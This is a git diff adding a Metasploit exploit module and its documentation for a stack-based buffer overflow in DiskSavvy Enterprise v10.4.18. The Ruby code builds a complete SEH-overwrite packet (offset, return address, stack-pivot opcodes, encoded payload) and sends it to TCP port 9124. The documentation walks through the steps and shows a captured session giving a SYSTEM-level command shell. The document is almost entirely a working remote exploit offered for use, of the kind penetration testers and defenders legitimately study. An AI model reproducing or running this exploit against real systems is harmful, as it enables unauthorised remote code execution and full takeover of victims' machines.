diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md new file mode 100644 index 0000000000..056f7bdd15 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -0,0 +1,39 @@ +## Vulnerable Application + +[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). + +## Verification Steps + 1. Install a vulnerable DiskSavvy Enterprise + 2. Start `msfconsole` + 3. Do `use exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 6. Do `exploit` + 7. Enjoy your shell + +## Scenarios + +### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/disk_savvy_adm +msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55 +RHOST => 192.168.216.55 +msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp +payload => windows/shell/bind_tcp +msf exploit(windows/misc/disk_savvy_adm) > exploit + +[*] Started bind handler +[*] Encoded stage with x86/shikata_ga_nai +[*] Sending encoded stage (267 bytes) to 192.168.216.55 +[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500 + +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32>whoami +whoami +nt authority\system + +C:\Windows\system32> +``` diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb new file mode 100644 index 0000000000..de4da979a3 --- /dev/null +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Savvy Enterprise v10.4.18', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module + has been tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x02\x0a\x0d\xf8", + 'Space' => 800 + }, + 'Targets' => + [ + [ 'Disk Savvy Enterprise v10.4.18', + { + 'Offset' => 124, + 'Ret' => 0x10056d13 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(9124)]) + + end + + def exploit + seh = generate_seh_record(target.ret) + connect + + buffer = make_nops(target['Offset']) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp + buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) + + header = "\x75\x19\xba\xab" + header << "\x03\x00\x00\x00" + header << "\x00\x40\x00\x00" + header << [buffer.length].pack("V") + header << [buffer.length].pack("V") + header << [buffer[-1].ord].pack("V") + packet = header + packet << buffer + + sock.put(packet) + handler + end +end